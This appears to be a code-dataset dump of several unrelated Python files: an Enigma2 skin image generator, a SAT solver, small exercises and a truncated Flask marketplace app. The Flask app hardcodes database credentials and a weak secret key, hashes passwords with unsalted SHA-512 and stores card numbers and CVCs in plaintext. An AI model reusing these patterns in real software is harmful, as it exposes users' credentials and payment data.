config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\tself.makeGradientpng(\"pvrstate\", 220, 90, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\telif config.plugins.KravenHD.PVRState.value in (\"pvrstate-center-small\", \"pvrstate-left-small\"):\n\t\t\tself.makeGradientpng(\"pvrstate\", 110, 45, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#Weather-small\n\t\tif self.actWeatherstyle == \"weather-small\":\n\t\t\tself.makeGradientpng(\"wsmall\", 300, 120, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\tdef makeSELGradientpng(self):\n\t\tself.makeGradientpng(\"sel_30\", 1220, 30, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_36\", 1196, 36, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_40\", 870, 40, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_45\", 747, 45, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_50\", 765, 50, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_53\", 736, 54, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_60\", 747, 60, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_70\", 765, 70, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_75\", 736, 75, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_90\", 870, 90, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_110\", 736, 110, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_135\", 736, 136, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_CS\", 765, self.actCSItemHeight, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"global\":\n\t\t\tif config.plugins.KravenHD.EMCStyle.value in (\"emc-verybigcover\", \"emc-verybigcover2\"):\n\t\t\t\tself.makeGradientpng(\"sel_28\", 777, 28, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\t\telse:\n\t\t\t\tself.makeGradientpng(\"sel_32\", 1196, 32, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\n\tdef makeGradientpng(self, name, width, height, color1, color2, trans):\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = 255 - int(trans, 16)\n\n\t\tcolor1 = color1[-6:]\n\t\tr1 = int(color1[0:2], 16)\n\t\tg1 = int(color1[2:4], 16)\n\t\tb1 = int(color1[4:6], 16)\n\t\tcolor2 = color2[-6:]\n\t\tr2 = int(color2[0:2], 16)\n\t\tg2 = int(color2[2:4], 16)\n\t\tb2 = int(color2[4:6], 16)\n\n\t\tgradient = Image.new(\"RGBA\", (1, height), (r2, g2, b2, trans))\n\t\tfor pos in range(0, height):\n\t\t\tp = pos / float(height)\n\t\t\tr = r2 * p + r1 * (1 - p)\n\t\t\tg = g2 * p + g1 * (1 - p)\n\t\t\tb = b2 * p + b1 * (1 - p)\n\t\t\tgradient.putpixel((0, pos), (int(r), int(g), int(b), int(trans)))\n\t\tgradient = gradient.resize((width, height))\n\t\tgradient.save(self.graphics + name + \".png\")\n\n\tdef makeBGTexturepng(self):\n\t\tself.makeTexturepng(\"globalbg\", 1280, 720, config.plugins.KravenHD.BackgroundTexture.value, config.plugins.KravenHD.BackgroundColorTrans.value)\n\t\tself.makeTexturepng(\"nontransbg\", 1280, 720, config.plugins.KravenHD.BackgroundTexture.value, \"00\")\n\t\tself.makeTexturepng(\"channelbg\", 1280, 720, config.plugins.KravenHD.BackgroundTexture.value, config.plugins.KravenHD.ChannelSelectionTrans.value)\n\n\tdef makeIBTexturepng(self):\n\t\tself.makeTexturepng(\"ibtexture\", 1280, 720, config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\tdef makeTexturepng(self, name, width, height, style, trans):\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = 255 - int(trans, 16)\n\n\t\tpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(path + style + \".png\"):\n\t\t\tbg = Image.open(path + style + \".png\")\n\t\telif fileExists(path + style + \".jpg\"):\n\t\t\tbg = Image.open(path + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timage = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timage.paste(bg, (i, j))\n\t\talpha = Image.new(\"L\", (width, height), trans)\n\t\timage.putalpha(alpha)\n\t\timage.save(self.graphics + name + \".png\")\n\n\tdef makebsWindowpng(self):\n\t\taddition = \"\"\n\t\tborder = None\n\t\tif config.plugins.KravenHD.PopupStyle.value == \"popup-grad-trans\":\n\t\t\taddition = \"_gr_tr\"\n\t\t\tborder = None\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-grad\":\n\t\t\taddition = \"_gr\"\n\t\t\tborder = None\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box-trans\":\n\t\t\taddition = \"_bx_tr\"\n\t\t\tborder = config.plugins.KravenHD.Border.value\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box\":\n\t\t\taddition = \"_bx\"\n\t\t\tborder = config.plugins.KravenHD.Border.value\n\n\t\tself.changeColor(\"bs_b\" + addition, \"bs_b\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_bl\" + addition, \"bs_bl\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_br\" + addition, \"bs_br\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_l\" + addition, \"bs_l\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_r\" + addition, \"bs_r\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_t\" + addition, \"bs_t\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_tl\" + addition, \"bs_tl\", self.skincolorbackgroundcolor, border)\n\t\tself.changeColor(\"bs_tr\" + addition, \"bs_tr\", self.skincolorbackgroundcolor, border)\n\n\tdef makeHorMenupng(self, color1, color2):\n\t\twidth = int(192 * self.factor)\n\t\theight = int(92 * self.factor)\n\t\tradius = int(10 * self.factor)\n\t\tgradientsize = int(24 * self.factor)\n\t\ttrans = 230\n\n\t\tcolor1 = color1[-6:]\n\t\tr1 = int(color1[0:2], 16)\n\t\tg1 = int(color1[2:4], 16)\n\t\tb1 = int(color1[4:6], 16)\n\t\tcolor2 = color2[-6:]\n\t\tr2 = int(color2[0:2], 16)\n\t\tg2 = int(color2[2:4], 16)\n\t\tb2 = int(color2[4:6], 16)\n\n\t\tmask = Image.new(\"L\", (width, height), trans)\n\t\tcorner = Image.new('L', (radius, radius), 0)\n\t\tdraw = ImageDraw.Draw(corner)\n\t\tdraw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, trans)\n\t\tmask.paste(corner, (0, 0))\n\t\tmask.paste(corner.transpose(Image.FLIP_LEFT_RIGHT), (width - radius, 0))\n\t\tmask.paste(corner.transpose(Image.ROTATE_180), (width - radius, height - radius))\n\t\tmask.paste(corner.transpose(Image.FLIP_TOP_BOTTOM), (0, height - radius))\n\n\t\tgradient = Image.new(\"RGBA\", (1, height / 2), (r2, g2, b2, trans))\n\t\tfor pos in range(0, gradientsize):\n\t\t\tp = pos / float(gradientsize)\n\t\t\tr = r2 * p + r1 * (1 - p)\n\t\t\tg = g2 * p + g1 * (1 - p)\n\t\t\tb = b2 * p + b1 * (1 - p)\n\t\t\tgradient.putpixel((0, pos), (int(r), int(g), int(b), trans))\n\t\tgradient = gradient.resize((width, height / 2))\n\n\t\timg = Image.new('RGBA', (width, height), (0, 0, 0, 0))\n\t\timg.paste(gradient, (0, 0))\n\t\timg.paste(gradient.transpose(Image.FLIP_TOP_BOTTOM), (0, height / 2))\n\t\timg.putalpha(mask)\n\t\timg.save(\"/usr/share/enigma2/KravenHD/buttons/icon1.png\")\n\n\tdef makeProgressBackground(self, width, color, output):\n\t\theight = int(21 * self.factor)\n\t\twidth = int(width * self.factor)\n\n\t\tcolor = color[-6:]\n\t\tr1 = int(color[0:2], 16)\n\t\tg1 = int(color[2:4], 16)\n\t\tb1 = int(color[4:6], 16)\n\n\t\timg = Image.open(self.templates + \"progress_bg_m.png\")\n\t\timg = img.resize((width, height))\n\t\tside = Image.open(self.templates + \"progress_bg_s.png\")\n\t\timg.paste(side, (0, 0))\n\t\timg.paste(side.transpose(Image.FLIP_LEFT_RIGHT), (width - int(10 * self.factor), 0))\n\n\t\tpixels = img.load()\n\t\tfor x in range(width):\n\t\t\tfor y in range(height):\n\t\t\t\tr, g, b, a = pixels[x, y]\n\t\t\t\tif (r, g, b) == (0, 0, 0):\n\t\t\t\t\tpixels[x, y] = (r1, g1, b1, a)\n\t\timg.save(self.graphics + output + \".png\")\n\n\tdef changeColor(self, input, output, color1, color2):\n\t\timg = Image.open(self.templates + input + \".png\")\n\n\t\tcolor1 = color1[-6:]\n\t\tr1 = int(color1[0:2], 16)\n\t\tg1 = int(color1[2:4], 16)\n\t\tb1 = int(color1[4:6], 16)\n\n\t\tpixels = img.load()\n\t\tfor x in range(img.size[0]):\n\t\t\tfor y in range(img.size[1]):\n\t\t\t\tr, g, b, a = pixels[x, y]\n\t\t\t\tif (r, g, b) == (0, 0, 0):\n\t\t\t\t\tpixels[x, y] = (r1, g1, b1, a)\n\t\t\t\tif color2 is not None:\n\t\t\t\t\tcolor2 = color2[-6:]\n\t\t\t\t\tr2 = int(color2[0:2], 16)\n\t\t\t\t\tg2 = int(color2[2:4], 16)\n\t\t\t\t\tb2 = int(color2[4:6], 16)\n\t\t\t\t\tif (r, g, b) == (254, 254, 254):\n\t\t\t\t\t\tpixels[x, y] = (r2, g2, b2, a)\n\t\timg.save(self.graphics + output + \".png\")\n\n\tdef makeborsetpng(self, color):\n\t\tcolor = color[-6:]\n\t\tr = int(color[0:2], 16)\n\t\tg = int(color[2:4], 16)\n\t\tb = int(color[4:6], 16)\n\n\t\timg = Image.new(\"RGBA\", (2, 2), (r, g, b, 255))\n\t\timg.save(self.graphics + \"borset.png\")\n\n\tdef dexpGradient(self, len, spd, pos):\n\t\tif pos < 0:\n\t\t\tpos = 0\n\t\tif pos > len-1:\n\t\t\tpos = len-1\n\t\ta = ((len/2)**spd)*2.0\n\t\tif pos <= len/2:\n\t\t\tf = (pos**spd)\n\t\telse:\n\t\t\tf = a-((len-pos)**spd)\n\t\te = int((f/a)*255)\n\t\treturn e\n\n\tdef calcBrightness(self, color, factor):\n\t\tf = int(int(factor)*25.5-255)\n\t\tcolor = color[-6:]\n\t\tr = int(color[0:2], 16)+f\n\t\tg = int(color[2:4], 16)+f\n\t\tb = int(color[4:6], 16)+f\n\t\tif r<0:\n\t\t\tr=0\n\t\tif g<0:\n\t\t\tg=0\n\t\tif b<0:\n\t\t\tb=0\n\t\tif r>255:\n\t\t\tr=255\n\t\tif g>255:\n\t\t\tg=255\n\t\tif b>255:\n\t\t\tb=255\n\t\treturn str(hex(r)[2:4]).zfill(2)+str(hex(g)[2:4]).zfill(2)+str(hex(b)[2:4]).zfill(2)\n\n\tdef calcTransparency(self, trans1, trans2):\n\t\tt1 = int(trans1, 16)\n\t\tt2 = int(trans2, 16)\n\t\treturn str(hex(min(t1, t2))[2:4]).zfill(2)\n\n\tdef hexRGB(self, color):\n\t\tcolor = color[-6:]\n\t\tr = int(color[0:2], 16)\n\t\tg = int(color[2:4], 16)\n\t\tb = int(color[4:6], 16)\n\t\treturn (r<<16)|(g<<8)|b\n\n\tdef RGB(self, r, g, b):\n\t\treturn (r<<16)|(g<<8)|b\n","repo_name":"oerlgrey/KravenHD","sub_path":"usr/lib/enigma2/python/Plugins/Extensions/KravenHD/KravenHD.py","file_name":"KravenHD.py","file_ext":"py","file_size_in_byte":302419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1531396300","text":"from boolean_utilities import *\nimport time\nfrom random import randint\nimport os\n\n\ndef log(fonction):\n def logging(*args, **kwargs):\n str2 = fonction.__name__.replace('_', ' ').title()\n timeBefore = time.time()\n ret = fonction(*args, **kwargs)\n timeAfter = time.time()\n execTime = timeAfter - timeBefore\n if execTime < 0.001:\n timeStr = \"{:.3f}\".format(execTime * 1000) + \" ms ]\"\n else:\n timeStr = \"{:.3f}\".format(execTime) + \" s ]\"\n logLine = \"(\" + os.environ[\"USER\"] + \")Running: \" + \\\n \"{: <17}\".format(str2) + \"[ exec-time = \" + timeStr\n # print(logLine)\n with open(\"machine.log\", \"a\") as logger:\n logger.write(logLine + \"\\n\")\n return ret\n return logging\n\n\n@log\ndef SATTruthtable(formula: str, verbose=False) -> bool:\n variables = find_number_variable(formula)\n n = len(variables)\n table = list(itertools.product([0, 1], repeat=n))\n for rank in table:\n changedFormula = formula\n for i in range(n):\n changedFormula = changedFormula.replace(variables[i], str(rank[i]))\n eval = eval_formula(changedFormula)\n if eval is True:\n if verbose is True:\n for i, variable in enumerate(variables):\n print(\"{}: {} \".format(variable, bool(rank[i])), end=\" \")\n print()\n return True\n if eval is None:\n return errorMessage()\n return False\n\n\nclass SATInstance:\n \"\"\"\n A class for each formula\n \"\"\"\n def __init__(self):\n self.variables = [] # la liste des variables\n self.variablesTable = {} # dictionnaire avec variable-value\n self.clauses = [] # la liste des clauses,avec les valeurs\n self.F = [] # la liste des clauses qui va se modifier\n\n def parseAndAddClauses(self, formula: str) -> None:\n \"\"\"\n Parse the formula and separate the different clauses\n Each variable of the dictionnary is value * 2,\n or value * 2 + 1 if the variable is with !\n \"\"\"\n negated = 0\n formule = formula[::-1]\n nbOfClauses = 1\n nbOflit = 1\n i = 0\n clause = []\n while formule[i] == \"&\":\n nbOfClauses += 1\n i += 1\n while i < len(formule):\n if formule[i] == \"|\":\n nbOflit += 1\n elif formule[i] == \"!\":\n negated = 1\n else:\n variable = formule[i]\n if variable not in self.variablesTable:\n self.variablesTable[variable] = len(self.variables)\n self.variables.append(variable)\n encodedLit = self.variablesTable[variable] << 1 | negated\n clause.append(encodedLit)\n nbOflit = nbOflit - 1\n negated = 0\n if nbOflit == 0:\n self.clauses.append(list(set(clause)))\n nbOflit = 1\n clause = []\n i += 1\n if len(self.clauses) != nbOfClauses: # juste une verif\n print(\"Ohoh, we made a mistake\")\n self.F = self.clauses.copy()\n\n def literalToString(self, literal: int) -> str:\n \"\"\"\n Recover the string from numerical variable\n \"\"\"\n s = '!' if literal & 1 else ''\n return self.variables[literal >> 1] + s\n\n def clauseToString(self, clause: list) -> str:\n \"\"\"\n Recover the expression of a clause\n \"\"\"\n return \" \".join(self.literalToString(lit) for lit in clause)\n\n def propagateUnits(self, F: list) -> list:\n \"\"\"\n for each unit clause {+/-x} in F\n remove all non-unit clauses containing + /-x\n remove all instances of - /+x in every clause // flipped sign!\n \"\"\"\n unitList = []\n for clause in F:\n # if len(clause) == 0:\n # return [[]]\n if len(clause) == 0:\n return [[]]\n if len(clause) == 1:\n unitList.append(clause[0])\n for nb in unitList:\n # if nb ^ 1 in unitList: # l'inverse\n # return [[]]\n if nb ^ 1 in unitList: # l'inverse\n return [[]]\n for clause in F:\n if nb in clause and len(clause) != 1:\n F.remove(clause)\n if nb ^ 1 in clause:\n clause.remove(nb ^ 1)\n return F\n\n def pureElimination(self, F: list) -> list:\n \"\"\"\n for each variable x\n if +/-x is pure in F\n remove all clauses containing + /-x\n add a unit clause {+/-x}\n \"\"\"\n lst = []\n for clause in F:\n lst += clause\n uniques = set(lst)\n # print(uniques)\n for val in uniques:\n if val ^ 1 not in uniques: # means val is pure\n # print(val)\n for clause in F:\n if val in clause:\n F.remove(clause)\n F.append([val])\n return F\n\n def addEliminatedVariables(self, F: list) -> list:\n \"\"\"\n create a unit clause for eliminated variables during procedure\n \"\"\"\n f = []\n for clause in F:\n f += clause\n f = set(f)\n for value in self.variablesTable.values():\n a = value << 1\n b = value << 1 | 1\n if a not in f and b not in f:\n F.append([value << 1])\n return F\n\n def solve(self, F) -> list:\n \"\"\"\n recursive DPLL algorithm\n \"\"\"\n F = self.propagateUnits(F)\n F = self.pureElimination(F)\n F = self.addEliminatedVariables(F)\n valueSet = set()\n for clause in F:\n if len(clause) == 0:\n return [[]]\n if len(clause) == 1:\n valueSet.add(clause[0])\n for n in valueSet:\n if n ^ 1 in valueSet:\n return [[]]\n if len(valueSet) == len(self.variables):\n return F\n x = -1\n for clause in F:\n if len(clause) > 1:\n x = clause[0]\n a = self.solve(F + [[x]])\n if a != [[]]:\n return a\n else:\n return self.solve(F + [[x ^ 1]])\n\n\n@log\ndef sat(formula: str, verbose=False) -> bool:\n \"\"\"\n DPLL sat solver, option verbose gives a solution if True\n \"\"\"\n cnfFormula = conjunctive_normal_form(formula)\n s = SATInstance()\n s.parseAndAddClauses(cnfFormula)\n F = s.clauses.copy()\n F = s.solve(F)\n if F == [[]]:\n return False\n if verbose is True:\n values = []\n for clause in F:\n values += clause\n val = set(values)\n for item in s.variablesTable.items():\n if item[1] << 1 in val:\n print(\"{}: True,\".format(item[0]), end=\" \")\n elif item[1] << 1 | 1 in val:\n print(\"{}: False,\".format(item[0]), end=\" \")\n else:\n print(\"y'a pb\")\n print()\n return True\n\n\ndef main():\n print(\"AB|\")\n print(SATTruthtable(\"AB|\", True))\n print(sat(\"AB|\", True))\n print()\n\n print(\"AB&\")\n print(SATTruthtable(\"AB&\", True))\n print(sat(\"AB&\", True))\n print()\n\n print(\"AA!&\")\n print(SATTruthtable(\"AA!&\", True))\n print(sat(\"AA!&\", True))\n print()\n\n print(\"AA^\")\n print(SATTruthtable(\"AA^\", True))\n print(sat(\"AA^\", True))\n print()\n\n print(\"D!F|D!E!G||H!J|H!I|I!A|G!I!B||A!C|B!C!|&&&&&&&\")\n print(SATTruthtable(\"D!F|D!E!G||H!J|H!I|I!A|G!I!B||A!C|B!C!|&&&&&&&\",\n True))\n print(sat(\"D!F|D!E!G||H!J|H!I|I!A|G!I!B||A!C|B!C!|&&&&&&&\", True))\n print()\n\n print(\"ABCDEFGHIJK!LMNOP&&&&&&&&&&&&&&&\")\n print(SATTruthtable(\"ABCDEFGHIJK!LMNOP&&&&&&&&&&&&&&&\", True))\n print(sat(\"ABCDEFGHIJK!LMNOP&&&&&&&&&&&&&&&\", True))\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"stelon77/42_AI_Branch","sub_path":"ReadySetBoole/ex07/sat.py","file_name":"sat.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72101368107","text":"from typing import List\n\ndef removeDuplicates(nums: List[int]) -> int:\n nums[:] = sorted(set(nums))\n print(nums)\n return len(nums)\n\n\nfirst_example = [0, 1, 1, 2, 2, 3, 3]\n\nprint(removeDuplicates(first_example))","repo_name":"davidyoon891122/LeetCode","sub_path":"RemoveDuplicateInSortedList/remove_duplicate_set.py","file_name":"remove_duplicate_set.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11445872877","text":"#escriba un numero de 4 digitos, y diga cuantos digitos son pares\nx=input() \n\nx_str=str(x)\n\nx1=x_str[0]\nx2=x_str[1]\nx3=x_str[2]\nx4=x_str[3]\n\nx1int= int(x1)\nx2int= int(x2)\nx3int= int(x3)\nx4int= int(x4)\n\n\nx_1=x1int % 2\nx_2=x2int % 2\nx_3=x3int % 2\nx_4=x4int % 2\n\nif x_1 == 0:\n y_1='Par'\n z_1=x1int\nelse:\n y_1='no'\n z_1=0\nif x_2 == 0: \n y_2='Par'\n z_2=x2int\nelse:\n y_2='no'\n z_2=0\nif x_3 == 0: \n y_3='Par'\n z_3=x3int\nelse:\n y_3='no'\n z_3=0\nif x_4 == 0: \n y_4='Par'\n z_4=x4int\nelse:\n y_4='no'\n z_4=0\n\nz= z_1+z_2+z_3+z_4\n\ny=y_1+y_2+y_3+y_4\n\nif y.count('Par') == 4:\n print('Todos son pares')\nif y.count('Par') == 3:\n print('3 son pares')\nif y.count('Par') == 2:\n print('2 son pares')\nif y.count('Par') == 1:\n print('1 es par')\nif y.count('Par') == 0:\n print('Todos son impares')\n\nprint('La suma de los numeros pares es:',z)","repo_name":"AndresBarr/Mintic","sub_path":"ejer17.py","file_name":"ejer17.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40957330251","text":"from crypt import methods\nfrom flask import Flask, make_response\nfrom markupsafe import escape\nfrom flask import render_template\nfrom flask import request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import url_for\nfrom flask import redirect\nfrom flask_login import (current_user, LoginManager,\n login_user, logout_user,\n login_required)\nfrom datetime import datetime\nimport hashlib\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://testuser:toledo22@localhost:3306/Offer'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\napp.secret_key = 'HelloWorld'\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'login'\n\nclass Usuario(db.Model):\n __tablename__ = \"usuario\"\n id = db.Column ('usu_id', db.Integer, primary_key=True)\n username = db.Column('username', db.String(45))\n nome = db.Column ('nome', db.String(100))\n email = db.Column ('email', db.String(100))\n senha = db.Column ('senha', db.String(256))\n telefone = db.Column ('telefone', db.String(20))\n rua = db.Column ('rua', db.String(150))\n numero = db.Column ('numero', db.String(10))\n bairro = db.Column ('bairro', db.String(45))\n cidade = db.Column ('cidade', db.String(45))\n estado = db.Column ('estado', db.String(45))\n cep = db.Column ('cep', db.String(10))\n\n favoritos = db.relationship(\"Favorito\", back_populates=\"usuario\")\n\n def __init__(self, username, nome, email, senha, telefone, rua, numero, bairro, cidade, estado, cep):\n self.username = username\n self.nome = nome\n self.email = email\n self.senha = senha\n self.telefone = telefone\n self.rua = rua\n self.numero = numero\n self.bairro = bairro\n self.cidade = cidade\n self.estado = estado\n self.cep = cep\n\n def is_authenticated(self):\n return True\n\n def is_active(self):\n return True\n\n def is_anonymous(self):\n return False\n\n def get_id(self):\n return str(self.id)\n\nclass Cartao(db.Model):\n __tablename__ = \"cartao\"\n id = db.Column ('cartao_id', db.Integer, primary_key=True)\n num_cartao = db.Column('num_cartao', db.String(20))\n nome_cartao = db.Column ('_nome_cartao', db.String(45))\n month = db.Column ('month', db.String(2))\n year = db.Column ('year', db.String(4))\n cvc = db.Column ('cvc', db.String(3))\n usuario_id = db.Column('usu_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n\n def __init__(self, num_cartao, nome_cartao, month, year, cvc, usuario_id):\n self.num_cartao = num_cartao\n self.nome_cartao = nome_cartao\n self.month = month\n self.year = year\n self.cvc = cvc\n self.usuario_id = usuario_id\n\nclass Categoria(db.Model):\n __tablename__ = \"categoria\"\n id = db.Column('cat_id', db.Integer, primary_key=True)\n nome = db.Column('cat_nome', db.String(150))\n desc = db.Column('cat_desc', db.String(150))\n\n produto = db.relationship(\"Produto\", back_populates=\"categoria\")\n\n def __init__ (self, nome, desc):\n self.nome = nome\n self.desc = desc\n\nclass Produto(db.Model):\n __tablename__ = \"produto\"\n id = db.Column('anu_id', db.Integer, primary_key=True)\n prod_nome = db.Column('prod_nome', db.String(45))\n prod_desc = db.Column('prod_desc', db.String(250))\n prod_espec = db.Column('prod_espec', db.String(250))\n prod_marca = db.Column('prod_marca', db.String(45))\n prod_modelo = db.Column('prod_modelo', db.String(45))\n prod_qtd = db.Column('prod_qtd', db.String(45))\n prod_preco = db.Column('prod_preco', db.String(45))\n cat_id = db.Column('cat_id', db.Integer, db.ForeignKey(\"categoria.cat_id\"))\n usu_id = db.Column('usu_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n\n favoritos = db.relationship(\"Favorito\", back_populates=\"produto\")\n categoria = db.relationship('Categoria', foreign_keys=[cat_id], backref=db.backref('produtos', lazy=True))\n usuario = db.relationship('Usuario', foreign_keys=[usu_id], backref=db.backref('produtos', lazy=True))\n\n\n def __init__(self, prod_nome, prod_desc, prod_espec, prod_marca, prod_modelo, prod_qtd, prod_preco, cat_id, usu_id):\n self.prod_nome = prod_nome\n self.prod_desc = prod_desc\n self.prod_espec = prod_espec\n self.prod_marca = prod_marca\n self.prod_modelo = prod_modelo\n self.prod_qtd = prod_qtd\n self.prod_preco = prod_preco\n self.cat_id = cat_id\n self.usu_id = usu_id\n\nclass Favorito(db.Model):\n __tablename__ = \"favorito\"\n id = db.Column('fav_id', db.Integer, primary_key=True)\n usuario_id = db.Column('usu_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n produto_id = db.Column('anu_id', db.Integer, db.ForeignKey(\"produto.anu_id\"))\n\n usuario = db.relationship(\"Usuario\", back_populates=\"favoritos\")\n produto = db.relationship(\"Produto\", back_populates=\"favoritos\")\n\n def __init__(self, usuario_id, produto_id):\n self.usuario_id = usuario_id\n self.produto_id = produto_id\n\nclass Compra(db.Model):\n __tablename__ = \"compra\"\n id = db.Column('compra_id', db.Integer, primary_key=True)\n produto_id = db.Column('anu_id', db.Integer, db.ForeignKey(\"produto.anu_id\"))\n vendedor_id = db.Column('vendedor_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n comprador_id = db.Column('comprador_id', db.Integer, db.ForeignKey(\"usuario.usu_id\"))\n cartao_id = db.Column('cartao_id', db.Integer, db.ForeignKey(\"cartao.cartao_id\"))\n quantidade = db.Column('quantidade', db.Integer)\n data_hora = db.Column('data_hora', db.DateTime)\n\n produto = db.relationship(\"Produto\")\n vendedor = db.relationship(\"Usuario\", foreign_keys=[vendedor_id])\n comprador = db.relationship(\"Usuario\", foreign_keys=[comprador_id])\n cartao = db.relationship(\"Cartao\")\n\n def __init__(self, produto_id, vendedor_id, comprador_id, cartao_id, quantidade):\n self.produto_id = produto_id\n self.vendedor_id = vendedor_id\n self.comprador_id = comprador_id\n self.cartao_id = cartao_id\n self.quantidade = quantidade\n self.data_hora = datetime.now()\n\nclass Pergunta(db.Model):\n __tablename__ = \"pergunta\"\n id = db.Column('pergunta_id', db.Integer, primary_key=True)\n produto_id = db.Column('produto_id', db.Integer, db.ForeignKey(\"produto.anu_id\"))\n texto = db.Column('texto', db.String(500))\n \n resposta = db.relationship(\"Resposta\", uselist=False, back_populates=\"pergunta\")\n\n def __init__(self, produto_id, texto):\n self.produto_id = produto_id\n self.texto = texto\n\nclass Resposta(db.Model):\n __tablename__ = \"resposta\"\n id = db.Column('resposta_id', db.Integer, primary_key=True)\n pergunta_id = db.Column('pergunta_id', db.Integer, db.ForeignKey(\"pergunta.pergunta_id\"))\n texto = db.Column('texto', db.String(500))\n\n pergunta = db.relationship(\"Pergunta\", back_populates=\"resposta\")\n\n def __init__(self, pergunta_id, texto):\n self.pergunta_id = pergunta_id\n self.texto = texto\n\n@app.errorhandler(404)\ndef pagnaoencontrada(error):\n return render_template('pagnaoencontrada.html')\n\n@login_manager.user_loader\ndef load_user(id):\n return Usuario.query.get(id)\n\n@app.route(\"/login\", methods=['GET','POST'])\ndef login():\n if request.method == 'POST':\n email = request.form.get('email')\n passwd = hashlib.sha512(str(request.form.get('passwd')).encode(\"utf-8\")).hexdigest()\n user = Usuario.query.filter_by(email=email, senha=passwd).first()\n\n if user:\n login_user(user)\n return redirect(url_for('central'))\n else:\n return redirect(url_for('login'))\n return render_template('login.html')\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n@app.route(\"/\")\ndef home():\n return render_template('home.html')\n\n@app.route(\"/central\")\n@login_required\ndef central():\n return render_template('central_usuario.html', titulo=\"Minha Conta\")\n\n@app.route(\"/usuario\")\ndef usuario():\n return render_template('usuario.html', usuarios = Usuario.query.all(), titulo=\"Usuário\")\n\n@app.route(\"/usuario/gerenciar\")\n@login_required\ndef gerenciaruser(): \n usuario = current_user\n return render_template('gerenciaruser.html', usuario=usuario, 